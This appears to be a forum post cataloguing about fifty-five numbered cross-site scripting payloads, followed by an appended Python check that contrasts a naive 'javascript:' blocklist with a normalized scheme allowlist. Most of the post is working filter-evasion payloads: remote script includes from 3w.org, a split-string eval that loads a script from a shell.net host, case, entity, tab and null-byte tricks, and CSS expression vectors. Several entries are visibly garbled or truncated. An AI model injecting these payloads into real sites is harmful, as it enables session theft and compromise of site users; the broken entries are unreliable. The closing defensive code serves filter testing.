XSS Attack Summary

OP
Posted on 2016-4-28 10:06:15
(1) Ordinary XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolon required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Working around a character limit (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect in China, because there is nowhere they can be exploited

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript that escapes the escaping filter

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image

<INPUT SRC=\'#\'" /span>

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME

<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an opening angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

expression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

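A defender-side check, added here as an example and not part of the original post: it shows why a filter that only looks for the literal lower-case string javascript: is defeated by the case, HTML-entity, embedded tab/newline/CR, null-byte and leading-space variants in items (3) to (19), and how decoding and stripping before an allowlist scheme check closes those gaps. The sample inputs and the ALLOWED_SCHEMES set are constructed for this example.

```python
import html
import re

# Constructed samples mirroring the variants the cheat sheet lists (items 3-5, 9-14, 17, 19).
CONSTRUCTED_SAMPLES = [
    "javascript:alert('XSS')",                                  # plain (item 3)
    "JaVaScRiPt:alert('XSS')",                                  # mixed case (item 4)
    "&#106;&#97;&#118;&#97;script:alert('XSS')",                # decimal entities (item 5)
    "&#0000106&#0000097&#0000118&#0000097script:alert('XSS')",  # 7-digit, no semicolons (item 9)
    "&#x6A;&#x61;&#x76;&#x61;script:alert('XSS')",              # hex entities (item 10)
    "jav\tascript:alert('XSS')",                                # embedded tab (item 11)
    "jav\nascript:alert('XSS')",                                # embedded newline (item 13)
    "jav\rascript:alert('XSS')",                                # embedded carriage return (item 14)
    "java\0script:alert('XSS')",                                # embedded null byte (item 17)
    "   javascript:alert('XSS')",                               # leading spaces (item 19)
    "https://example.com/page?x=1",                             # benign absolute URL
    "/relative/path",                                           # benign relative URL
]

# Assumed allowlist for this example; a real application picks the schemes it actually needs.
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# Every ASCII control character plus space: browsers discard these at the ends of a URL.
_EDGE_JUNK = "".join(chr(c) for c in range(0x21))


def naive_is_safe(url):
    """Blocklist on the literal lower-case prefix: only the plain form is caught."""
    return not url.startswith("javascript:")


def scheme_of(url):
    """Return the lower-cased scheme a browser would actually see, or None for relative URLs."""
    decoded = html.unescape(url)                    # &#106; / &#x6A; / &#0000106 all become 'j'
    decoded = re.sub(r"[\x00\t\n\r]", "", decoded)  # tab, LF, CR and NUL are ignored anywhere
    decoded = decoded.strip(_EDGE_JUNK)             # leading/trailing spaces and controls
    match = re.match(r"([a-zA-Z][a-zA-Z0-9+.\-]*):", decoded)
    return match.group(1).lower() if match else None


def is_safe_url(url):
    """Allowlist check: relative URLs and allowed schemes pass, anything else is rejected."""
    scheme = scheme_of(url)
    return scheme is None or scheme in ALLOWED_SCHEMES


def audit(urls):
    """Map each URL to (naive verdict, hardened verdict) so the two filters can be compared."""
    return {u: (naive_is_safe(u), is_safe_url(u)) for u in urls}
```

Running audit(CONSTRUCTED_SAMPLES) shows the naive filter passing nine of the ten hostile variants while the normalized check rejects all ten and still accepts the two benign URLs.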